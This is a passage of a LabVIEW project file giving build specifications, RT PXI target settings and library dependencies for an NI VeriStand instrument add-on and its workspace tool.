Shared.lvlib/Type</Property> <Property Name="Source[11].type" Type="Str">Container</Property> <Property Name="Source[12].destinationIndex" Type="Int">2</Property> <Property Name="Source[12].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Shared.lvlib</Property> <Property Name="Source[12].Library.allowMissingMembers" Type="Bool">true</Property> <Property Name="Source[12].type" Type="Str">Library</Property> <Property Name="Source[2].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[2].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[2].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[2].destinationIndex" Type="Int">2</Property> <Property Name="Source[2].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Shared.lvlib/Shared</Property> <Property Name="Source[2].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[2].properties[0].value" Type="Bool">false</Property> <Property Name="Source[2].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[2].properties[1].value" Type="Bool">true</Property> <Property Name="Source[2].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[2].properties[2].value" Type="Bool">false</Property> <Property Name="Source[2].properties[3].type" Type="Str">Allow debugging</Property> <Property Name="Source[2].properties[3].value" Type="Bool">false</Property> <Property Name="Source[2].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[2].properties[4].value" Type="Bool">false</Property> <Property Name="Source[2].propertiesCount" Type="Int">5</Property> <Property Name="Source[2].type" Type="Str">Container</Property> <Property Name="Source[3].destinationIndex" Type="Int">2</Property> <Property Name="Source[3].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Objects.lvlib</Property> <Property Name="Source[3].Library.allowMissingMembers" Type="Bool">true</Property> <Property Name="Source[3].type" Type="Str">Library</Property> <Property Name="Source[4].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[4].destinationIndex" Type="Int">2</Property> <Property Name="Source[4].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Shared.lvlib/SubVIs</Property> <Property Name="Source[4].type" Type="Str">Container</Property> <Property Name="Source[5].destinationIndex" Type="Int">0</Property> <Property Name="Source[5].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Objects.lvlib/Instrument - Manual Object.vi</Property> <Property Name="Source[5].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[5].type" Type="Str">VI</Property> <Property Name="Source[6].destinationIndex" Type="Int">2</Property> <Property Name="Source[6].itemID" Type="Ref">/My Computer/APIs/Instrument Host Automation API.lvlib</Property> <Property Name="Source[6].Library.allowMissingMembers" Type="Bool">true</Property> <Property Name="Source[6].type" Type="Str">Library</Property> <Property Name="Source[7].destinationIndex" Type="Int">2</Property> <Property Name="Source[7].itemID" Type="Ref">/My Computer/APIs/Instrument Host Automation API.lvlib/Close Connection with CD.vi</Property> <Property Name="Source[7].type" Type="Str">VI</Property> <Property Name="Source[8].destinationIndex" Type="Int">2</Property> <Property Name="Source[8].itemID" Type="Ref">/My Computer/APIs/Instrument Host Automation API.lvlib/Initialize Connection with CD.vi</Property> <Property Name="Source[8].type" Type="Str">VI</Property> <Property Name="Source[9].destinationIndex" Type="Int">2</Property> <Property Name="Source[9].itemID" Type="Ref">/My Computer/APIs/Instrument Host Automation API.lvlib/Instrument Command Response.vi</Property> <Property Name="Source[9].type" Type="Str">VI</Property> <Property Name="SourceCount" Type="Int">13</Property> </Item> <Item Name="Workspace Tool" Type="Source Distribution"> <Property Name="Bld_buildCacheID" Type="Str">{38AA3848-69E7-4432-8DD1-9443FCC8B810}</Property> <Property Name="Bld_buildSpecName" Type="Str">Workspace Tool</Property> <Property Name="Bld_excludeLibraryItems" Type="Bool">true</Property> <Property Name="Bld_excludePolymorphicVIs" Type="Bool">true</Property> <Property Name="Bld_excludeTypedefs" Type="Bool">true</Property> <Property Name="Bld_localDestDir" Type="Path">../Built/Workspace Tools/Instrument Tool</Property> <Property Name="Bld_localDestDirType" Type="Str">relativeToCommon</Property> <Property Name="Bld_postActionVIID" Type="Ref">/My Computer/Utilities/Copy .LLB to NI VeriStand dir.vi</Property> <Property Name="Bld_previewCacheID" Type="Str">{01EF7FCC-6B96-4F26-A5FD-03ABDACD5F91}</Property> <Property Name="Bld_version.major" Type="Int">1</Property> <Property Name="Destination[0].destName" Type="Str">Destination Directory</Property> <Property Name="Destination[0].path" Type="Path">../Built/Workspace Tools/Instrument Tool</Property> <Property Name="Destination[1].destName" Type="Str">Support Directory</Property> <Property Name="Destination[1].path" Type="Path">../Built/Workspace Tools/Instrument Tool/Data</Property> <Property Name="Destination[2].destName" Type="Str">Instrument Tool Support</Property> <Property Name="Destination[2].path" Type="Path">../Built/Workspace Tools/Instrument Tool/Instrument Tool Support.llb</Property> <Property Name="Destination[2].type" Type="Str">LLB</Property> <Property Name="DestinationCount" Type="Int">3</Property> <Property Name="Source[0].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[0].destinationIndex" Type="Int">2</Property> <Property Name="Source[0].itemID" Type="Str">{F1F98602-19FF-4B55-8FF0-5AA5971474BB}</Property> <Property Name="Source[0].type" Type="Str">Container</Property> <Property Name="Source[1].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[1].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[1].itemID" Type="Ref"></Property> <Property Name="Source[1].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[1].properties[0].value" Type="Bool">true</Property> <Property Name="Source[1].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[1].properties[1].value" Type="Bool">true</Property> <Property Name="Source[1].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[1].properties[2].value" Type="Bool">false</Property> <Property Name="Source[1].properties[3].type" Type="Str">Allow debugging</Property> <Property Name="Source[1].properties[3].value" Type="Bool">false</Property> <Property Name="Source[1].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[1].properties[4].value" Type="Bool">false</Property> <Property Name="Source[1].propertiesCount" Type="Int">5</Property> <Property Name="Source[1].type" Type="Str">Container</Property> <Property Name="Source[10].destinationIndex" Type="Int">0</Property> <Property Name="Source[10].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Tool.lvlib/Instrument - Tool.rtm</Property> <Property Name="Source[10].lvfile" Type="Bool">true</Property> <Property Name="Source[10].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[11].destinationIndex" Type="Int">0</Property> <Property Name="Source[11].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Tool.lvlib/Instrument - Tool.vi</Property> <Property Name="Source[11].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[11].type" Type="Str">VI</Property> <Property Name="Source[12].destinationIndex" Type="Int">2</Property> <Property Name="Source[12].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Tool.lvlib</Property> <Property Name="Source[12].Library.allowMissingMembers" Type="Bool">true</Property> <Property Name="Source[12].type" Type="Str">Library</Property> <Property Name="Source[13].destinationIndex" Type="Int">2</Property> <Property Name="Source[13].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Shared.lvlib</Property> <Property Name="Source[13].Library.allowMissingMembers" Type="Bool">true</Property> <Property Name="Source[13].type" Type="Str">Library</Property> <Property Name="Source[2].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[2].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[2].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[2].destinationIndex" Type="Int">2</Property> <Property Name="Source[2].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Shared.lvlib/Shared</Property> <Property Name="Source[2].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[2].properties[0].value" Type="Bool">false</Property> <Property Name="Source[2].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[2].properties[1].value" Type="Bool">true</Property> <Property Name="Source[2].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[2].properties[2].value" Type="Bool">false</Property> <Property Name="Source[2].properties[3].type" Type="Str">Allow debugging</Property> <Property Name="Source[2].properties[3].value" Type="Bool">false</Property> <Property Name="Source[2].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[2].properties[4].value" Type="Bool">false</Property> <Property Name="Source[2].propertiesCount" Type="Int">5</Property> <Property Name="Source[2].type" Type="Str">Container</Property> <Property Name="Source[3].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[3].destinationIndex" Type="Int">2</Property> <Property Name="Source[3].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Shared.lvlib/SubVIs</Property> <Property Name="Source[3].type" Type="Str">Container</Property> <Property Name="Source[4].destinationIndex" Type="Int">2</Property> <Property Name="Source[4].itemID" Type="Ref">/My Computer/APIs/Instrument Host Automation API.lvlib</Property> <Property Name="Source[4].Library.allowMissingMembers" Type="Bool">true</Property> <Property Name="Source[4].type" Type="Str">Library</Property> <Property Name="Source[5].destinationIndex" Type="Int">2</Property> <Property Name="Source[5].itemID" Type="Ref">/My Computer/APIs/Instrument Host Automation API.lvlib/Close Connection with CD.vi</Property> <Property Name="Source[5].type" Type="Str">VI</Property> <Property Name="Source[6].destinationIndex" Type="Int">2</Property> <Property Name="Source[6].itemID" Type="Ref">/My Computer/APIs/Instrument Host Automation API.lvlib/Initialize Connection with CD.vi</Property> <Property Name="Source[6].type" Type="Str">VI</Property> <Property Name="Source[7].destinationIndex" Type="Int">2</Property> <Property Name="Source[7].itemID" Type="Ref">/My Computer/APIs/Instrument Host Automation API.lvlib/Instrument Command Response.vi</Property> <Property Name="Source[7].type" Type="Str">VI</Property> <Property Name="Source[8].destinationIndex" Type="Int">2</Property> <Property Name="Source[8].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Shared.lvlib</Property> <Property Name="Source[8].Library.allowMissingMembers" Type="Bool">true</Property> <Property Name="Source[8].type" Type="Str">Library</Property> <Property Name="Source[9].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[9].Container.depDestIndex" Type="Int">0</Property> <Property Name="Source[9].destinationIndex" Type="Int">2</Property> <Property Name="Source[9].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Shared.lvlib/Type</Property> <Property Name="Source[9].type" Type="Str">Container</Property> <Property Name="SourceCount" Type="Int">14</Property> </Item> <Item Name="Workspace Tool EXE" Type="EXE"> <Property Name="App_copyErrors" Type="Bool">true</Property> <Property Name="App_INI_aliasGUID" Type="Str">{A1219698-6D43-40B3-AF5A-868C36D4530F}</Property> <Property Name="App_INI_GUID" Type="Str">{703C13A7-1454-4024-8B4A-61789C0AC79C}</Property> <Property Name="App_serverConfig.httpPort" Type="Int">8002</Property> <Property Name="Bld_autoIncrement" Type="Bool">true</Property> <Property Name="Bld_buildCacheID" Type="Str">{17D87870-65B4-41CB-AC83-646A11A2F165}</Property> <Property Name="Bld_buildSpecName" Type="Str">Workspace Tool EXE</Property> <Property Name="Bld_excludeInlineSubVIs" Type="Bool">true</Property> <Property Name="Bld_excludeLibraryItems" Type="Bool">true</Property> <Property Name="Bld_excludePolymorphicVIs" Type="Bool">true</Property> <Property Name="Bld_localDestDir" Type="Path">../Built/Workspace Tools/Instrument Tool</Property> <Property Name="Bld_localDestDirType" Type="Str">relativeToCommon</Property> <Property Name="Bld_modifyLibraryFile" Type="Bool">true</Property> <Property Name="Bld_postActionVIID" Type="Ref">/My Computer/Utilities/Copy .LLB to NI VeriStand dir.vi</Property> <Property Name="Bld_previewCacheID" Type="Str">{D0279B8E-5CAD-4522-888A-CE9C227A53F0}</Property> <Property Name="Bld_version.build" Type="Int">9</Property> <Property Name="Bld_version.major" Type="Int">1</Property> <Property Name="Destination[0].destName" Type="Str">Instrument Tool.exe</Property> <Property Name="Destination[0].path" Type="Path">../Built/Workspace Tools/Instrument Tool/Instrument Tool.exe</Property> <Property Name="Destination[0].preserveHierarchy" Type="Bool">true</Property> <Property Name="Destination[0].type" Type="Str">App</Property> <Property Name="Destination[1].destName" Type="Str">Support Directory</Property> <Property Name="Destination[1].path" Type="Path">../Built/Workspace Tools/Instrument Tool/data</Property> <Property Name="DestinationCount" Type="Int">2</Property> <Property Name="Source[0].itemID" Type="Str">{017398A6-F806-439D-96C1-011D995812A9}</Property> <Property Name="Source[0].type" Type="Str">Container</Property> <Property Name="Source[1].destinationIndex" Type="Int">0</Property> <Property Name="Source[1].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Tool.lvlib/Instrument - Tool.vi</Property> <Property Name="Source[1].sourceInclusion" Type="Str">TopLevel</Property> <Property Name="Source[1].type" Type="Str">VI</Property> <Property Name="Source[2].destinationIndex" Type="Int">0</Property> <Property Name="Source[2].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Tool.lvlib/Instrument - Tool.rtm</Property> <Property Name="Source[2].lvfile" Type="Bool">true</Property> <Property Name="Source[2].sourceInclusion" Type="Str">Include</Property> <Property Name="SourceCount" Type="Int">3</Property> <Property Name="TgtF_companyName" Type="Str">National Instruments</Property> <Property Name="TgtF_fileDescription" Type="Str">Workspace Tool EXE</Property> <Property Name="TgtF_internalName" Type="Str">Workspace Tool EXE</Property> <Property Name="TgtF_legalCopyright" Type="Str">Copyright © 2020 National Instruments</Property> <Property Name="TgtF_productName" Type="Str">Workspace Tool EXE</Property> <Property Name="TgtF_targetfileGUID" Type="Str">{CAC16CF5-B759-48ED-BC48-1667BD17E1E4}</Property> <Property Name="TgtF_targetfileName" Type="Str">Instrument Tool.exe</Property> <Property Name="TgtF_versionIndependent" Type="Bool">true</Property> </Item> </Item> </Item> <Item Name="RT PXI Target - Pharlap" Type="RT PXI Chassis"> <Property Name="alias.name" Type="Str">RT PXI Target - Pharlap</Property> <Property Name="alias.value" Type="Str">0.0.0.0</Property> <Property Name="CCSymbols" Type="Str">TARGET_TYPE,RT;OS,PharLap;CPU,x86;</Property> <Property Name="host.ResponsivenessCheckEnabled" Type="Bool">true</Property> <Property Name="host.ResponsivenessCheckPingDelay" Type="UInt">5000</Property> <Property Name="host.ResponsivenessCheckPingTimeout" Type="UInt">1000</Property> <Property Name="host.TargetCPUID" Type="UInt">3</Property> <Property Name="host.TargetOSID" Type="UInt">15</Property> <Property Name="target.cleanupVisa" Type="Bool">false</Property> <Property Name="target.FPProtocolGlobals_ControlTimeLimit" Type="Int">300</Property> <Property Name="target.getDefault-&gt;WebServer.Port" Type="Int">80</Property> <Property Name="target.getDefault-&gt;WebServer.Timeout" Type="Int">60</Property> <Property Name="target.IOScan.Faults" Type="Str"></Property> <Property Name="target.IOScan.NetVarPeriod" Type="UInt">100</Property> <Property Name="target.IOScan.NetWatchdogEnabled" Type="Bool">false</Property> <Property Name="target.IOScan.Period" Type="UInt">10000</Property> <Property Name="target.IOScan.PowerupMode" Type="UInt">0</Property> <Property Name="target.IOScan.Priority" Type="UInt">0</Property> <Property Name="target.IOScan.ReportModeConflict" Type="Bool">true</Property> <Property Name="target.IsRemotePanelSupported" Type="Bool">true</Property> <Property Name="target.RTCPULoadMonitoringEnabled" Type="Bool">true</Property> <Property Name="target.RTDebugWebServerHTTPPort" Type="Int">8001</Property> <Property Name="target.RTTarget.ApplicationPath" Type="Path">/c/ni-rt/startup/startup.rtexe</Property> <Property Name="target.RTTarget.EnableFileSharing" Type="Bool">true</Property> <Property Name="target.RTTarget.IPAccess" Type="Str">+*</Property> <Property Name="target.RTTarget.LaunchAppAtBoot" Type="Bool">false</Property> <Property Name="target.RTTarget.VIPath" Type="Path">/c/ni-rt/startup</Property> <Property Name="target.server.app.propertiesEnabled" Type="Bool">true</Property> <Property Name="target.server.control.propertiesEnabled" Type="Bool">true</Property> <Property Name="target.server.tcp.access" Type="Str">+*</Property> <Property Name="target.server.tcp.enabled" Type="Bool">false</Property> <Property Name="target.server.tcp.paranoid" Type="Bool">true</Property> <Property Name="target.server.tcp.port" Type="Int">3363</Property> <Property Name="target.server.tcp.serviceName" Type="Str">Main Application Instance/VI Server</Property> <Property Name="target.server.tcp.serviceName.default" Type="Str">Main Application Instance/VI Server</Property> <Property Name="target.server.vi.access" Type="Str">+*</Property> <Property Name="target.server.vi.callsEnabled" Type="Bool">true</Property> <Property Name="target.server.vi.propertiesEnabled" Type="Bool">true</Property> <Property Name="target.WebServer.Enabled" Type="Bool">false</Property> <Property Name="target.WebServer.LogEnabled" Type="Bool">false</Property> <Property Name="target.WebServer.LogPath" Type="Path">/c/ni-rt/system/www/www.log</Property> <Property Name="target.WebServer.Port" Type="Int">80</Property> <Property Name="target.WebServer.RootPath" Type="Path">/c/ni-rt/system/www</Property> <Property Name="target.WebServer.TcpAccess" Type="Str">c+*</Property> <Property Name="target.WebServer.Timeout" Type="Int">60</Property> <Property Name="target.WebServer.ViAccess" Type="Str">+*</Property> <Property Name="target.webservices.SecurityAPIKey" Type="Str">PqVr/ifkAQh+lVrdPIykXlFvg12GhhQFR8H9cUhphgg=:pTe9HRlQuMfJxAG6QCGq7UvoUpJzAzWGKy5SbZ+roSU=</Property> <Property Name="target.webservices.ValidTimestampWindow" Type="Int">15</Property> <Item Name="Instrument Addon Engine.lvlib" Type="Library" URL="../Addon/Addon Engine/Instrument Addon Engine.lvlib"/> <Item Name="Protections.lvlibp" Type="LVLibp" URL="../Addon/Support Libraries/Protections.lvlibp"> <Item Name="Checksum U8.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protections.lvlibp/Checksum U8/Checksum U8.lvclass"/> <Item Name="Checksum U16.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protections.lvlibp/Checksum U16/Checksum U16.lvclass"/> <Item Name="Checksum U32.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protections.lvlibp/Checksum U32/Checksum U32.lvclass"/> <Item Name="CRC-32.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protections.lvlibp/CRC-32/CRC-32.lvclass"/> <Item Name="Error Cluster From Error Code.vi" Type="VI" URL="../Addon/Support Libraries/Protections.lvlibp/1abvi3w/vi.lib/Utility/error.llb/Error Cluster From Error Code.vi"/> <Item Name="Protection.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protections.lvlibp/Parent Protection/Protection.lvclass"/> </Item> <Item Name="Protocols.lvlibp" Type="LVLibp" URL="../Addon/Support Libraries/Protocols.lvlibp"> <Item Name="AK" Type="Folder"> <Item Name="AK RS-xxx.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/AK RS-xxx/AK RS-xxx.lvclass"/> <Item Name="AK TCP.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/AK TCP/AK TCP.lvclass"/> <Item Name="Format AK Command.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/AK/Format AK Command.vi"/> <Item Name="Format AK Response.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/AK/Format AK Response.vi"/> </Item> <Item Name="Protocol Parent" Type="Folder"> <Item Name="Protocol Parent.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/Protocol Parent/Protocol Parent.lvclass"/> </Item> <Item Name="RS-xxx" Type="Folder"> <Item Name="RS-xxx.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/RS-xxx/RS-xxx.lvclass"/> </Item> <Item Name="RS-xxx to GPIB ConvBox" Type="Folder"> <Item Name="RS-xxx to GPIB ConvBox.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/RS-xxx to GPIB ConvBox/RS-xxx to GPIB ConvBox.lvclass"/> </Item> <Item Name="TCP" Type="Folder"> <Item Name="TCP.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/TCP/TCP.lvclass"/> </Item> <Item Name="UDP" Type="Folder"> <Item Name="UDP.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/UDP/UDP.lvclass"/> </Item> <Item Name="VISA" Type="Folder"> <Item Name="VISA.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/VISA/VISA.lvclass"/> </Item> <Item Name="Clear Errors.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/Utility/error.llb/Clear Errors.vi"/> <Item Name="Error Cluster From Error Code.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/Utility/error.llb/Error Cluster From Error Code.vi"/> <Item Name="GPIB Status Boolean Array.ctl" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/Instr/_visa.llb/GPIB Status Boolean Array.ctl"/> <Item Name="nirviCommon.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/express/rvi/timingcommon/nirviCommon.vi"/> <Item Name="Space Constant.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/dlg_ctls.llb/Space Constant.vi"/> <Item Name="VISA Configure Serial Port (Instr).vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/Instr/_visa.llb/VISA Configure Serial Port (Instr).vi"/> <Item Name="VISA Flush IO Buffer Mask.ctl" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/Instr/_visa.llb/VISA Flush IO Buffer Mask.ctl"/> </Item> <Item Name="Dependencies" Type="Dependencies"> <Item Name="vi.lib" Type="Folder"> <Item Name="Advanced System Definition.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NI VeriStand Advanced SysDef API/SysDef API/Advanced System Definition.lvlib"/> <Item Name="AMC.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/AMC/AMC.lvlib"/> <Item Name="Clear Errors.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Clear Errors.vi"/> <Item Name="Custom Device API.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI VeriStand/Custom Device API/Custom Device API.lvlib"/> <Item Name="Custom Device Utility Library.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI VeriStand/Custom Device Tools/Custom Device Utility Library/Custom Device Utility Library.lvlib"/> <Item Name="Data Access Engine.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NIVS Inline Async API/_Data Access Engine/Data Access Engine.lvlib"/> <Item Name="Error Cluster From Error Code.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Error Cluster From Error Code.vi"/> <Item Name="Error Code Database.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Error Code Database.vi"/> <Item Name="Find Tag.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Find Tag.vi"/> <Item Name="Get File Extension.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/libraryn.llb/Get File Extension.vi"/> <Item Name="Get LV Class Default Value.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/LVClass/Get LV Class Default Value.vi"/> <Item Name="NI STM.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/STM/NI STM.lvlib"/> <Item Name="NI VeriStand Addon Network Comm Shared.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NI VeriStand Addon Network Comm/Shared/NI VeriStand Addon Network Comm Shared.lvlib"/> <Item Name="NI VeriStand Addon Network Comm.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NI VeriStand Addon Network Comm/Engine/NI VeriStand Addon Network Comm.lvlib"/> <Item Name="NI_FTP.lvlib" Type="Library" URL="/&lt;vilib&gt;/FTP/NI_FTP.lvlib"/> <Item Name="NI_PackedLibraryUtility.lvlib" Type="Library" URL="/&lt;vilib&gt;/Utility/LVLibp/NI_PackedLibraryUtility.lvlib"/> <Item Name="NI_SystemLogging.lvlib" Type="Library" URL="/&lt;vilib&gt;/Utility/SystemLogging/NI_SystemLogging.lvlib"/> <Item Name="NIVeriStand_DataServices.dll" Type="Document" URL="/&lt;vilib&gt;/NI Veristand/Custom Device API/Data/NIVeriStand_DataServices.dll"/> <Item Name="Search and Replace Pattern.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Search and Replace Pattern.vi"/> <Item Name="TagReturnType.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/TagReturnType.ctl"/> <Item Name="Tools_KeyedArray.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/Tools/Keyed Array/Tools_KeyedArray.lvlib"/> <Item Name="Tools_String.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/Tools/String/Tools_String.lvlib"/> <Item Name="Trim Whitespace.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Trim Whitespace.vi"/> <Item Name="VariantType.lvlib" Type="Library" URL="/&lt;vilib&gt;/Utility/VariantDataType/VariantType.lvlib"/> <Item Name="VS Inline Async API.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NIVS Inline Async API/_VS Inline Async API/VS Inline Async API.lvlib"/> <Item Name="whitespace.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/whitespace.ctl"/> </Item> <Item Name="Instrument Addon Shared.lvlib" Type="Library" URL="../Addon/Addon Shared/Instrument Addon Shared.lvlib"/> <Item Name="LV Config Read String.vi" Type="VI" URL="/&lt;resource&gt;/dialog/lvconfig.llb/LV Config Read String.vi"/> <Item Name="mscorlib" Type="VI" URL="mscorlib"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="NationalInstruments.VeriStand" Type="Document" URL="NationalInstruments.VeriStand"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="NationalInstruments.VeriStand.SystemDefinitionAPI" Type="Document" URL="NationalInstruments.VeriStand.SystemDefinitionAPI"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="NationalInstruments.VeriStand.SystemStorage" Type="Document" URL="NationalInstruments.VeriStand.SystemStorage"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="systemLogging.dll" Type="Document" URL="systemLogging.dll"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> </Item> <Item Name="Build Specifications" Type="Build"> <Item Name="Engine Release" Type="Source Distribution"> <Property Name="Bld_autoIncrement" Type="Bool">true</Property> <Property Name="Bld_buildCacheID" Type="Str">{F48EE3B1-BA4E-4696-B5A1-472559F89AB8}</Property> <Property Name="Bld_buildSpecName" Type="Str">Engine Release</Property> <Property Name="Bld_excludeLibraryItems" Type="Bool">true</Property> <Property Name="Bld_excludePolymorphicVIs" Type="Bool">true</Property> <Property Name="Bld_localDestDir" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME</Property> <Property Name="Bld_localDestDirType" Type="Str">relativeToCommon</Property> <Property Name="Bld_postActionVIID" Type="Ref">/My Computer/Utilities/Copy .LLB to NI VeriStand dir.vi</Property> <Property Name="Bld_previewCacheID" Type="Str">{FB085711-B7CD-49CE-AB6A-241C33E6676C}</Property> <Property Name="Bld_targetDestDir" Type="Path">/Pharlap/Instrument Addon Engine Pharlap.llb</Property> <Property Name="Bld_version.build" Type="Int">34</Property> <Property Name="Bld_version.major" Type="Int">1</Property> <Property Name="Destination[0].destName" Type="Str">Destination Directory</Property> <Property Name="Destination[0].path" Type="Path">/Pharlap/Instrument Addon Engine Pharlap.llb</Property> <Property Name="Destination[0].path.type" Type="Str">&lt;none&gt;</Property> <Property Name="Destination[0].type" Type="Str">LLB</Property> <Property Name="Destination[1].destName" Type="Str">Support Directory</Property> <Property Name="Destination[1].path" Type="Path">/Pharlap/data</Property> <Property Name="Destination[1].path.type" Type="Str">&lt;none&gt;</Property> <Property Name="Destination[2].destName" Type="Str">PackedLibs</Property> <Property Name="Destination[2].path" Type="Path">/Pharlap</Property> <Property Name="Destination[2].path.type" Type="Str">&lt;none&gt;</Property> <Property Name="DestinationCount" Type="Int">3</Property> <Property Name="Source[0].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[0].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[0].destinationIndex" Type="Int">0</Property> <Property Name="Source[0].itemID" Type="Str">{77DA3AC3-44DB-4DCE-A2E0-1FECBC99388E}</Property> <Property Name="Source[0].properties[0].type" Type="Str">Run when opened</Property> <Property Name="Source[0].properties[0].value" Type="Bool">false</Property> <Property Name="Source[0].properties[1].type" Type="Str">Allow debugging</Property> <Property Name="Source[0].properties[1].value" Type="Bool">false</Property> <Property Name="Source[0].properties[2].type" Type="Str">Auto error handling</Property> <Property Name="Source[0].properties[2].value" Type="Bool">false</Property> <Property Name="Source[0].properties[3].type" Type="Str">Remove front panel</Property> <Property Name="Source[0].properties[3].value" Type="Bool">true</Property> <Property Name="Source[0].properties[4].type" Type="Str">Remove block diagram</Property> <Property Name="Source[0].properties[4].value" Type="Bool">true</Property> <Property Name="Source[0].propertiesCount" Type="Int">5</Property> <Property Name="Source[0].type" Type="Str">Container</Property> <Property Name="Source[1].destinationIndex" Type="Int">0</Property> <Property Name="Source[1].itemID" Type="Ref">/RT PXI Target - Pharlap/Instrument Addon Engine.lvlib/RT Driver VI.vi</Property> <Property Name="Source[1].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[1].properties[0].value" Type="Bool">false</Property> <Property Name="Source[1].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[1].properties[1].value" Type="Bool">true</Property> <Property Name="Source[1].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[1].properties[2].value" Type="Bool">false</Property> <Property Name="Source[1].properties[3].type" Type="Str">Allow debugging</Property> <Property Name="Source[1].properties[3].value" Type="Bool">false</Property> <Property Name="Source[1].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[1].properties[4].value" Type="Bool">false</Property> <Property Name="Source[1].propertiesCount" Type="Int">5</Property> <Property Name="Source[1].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[1].type" 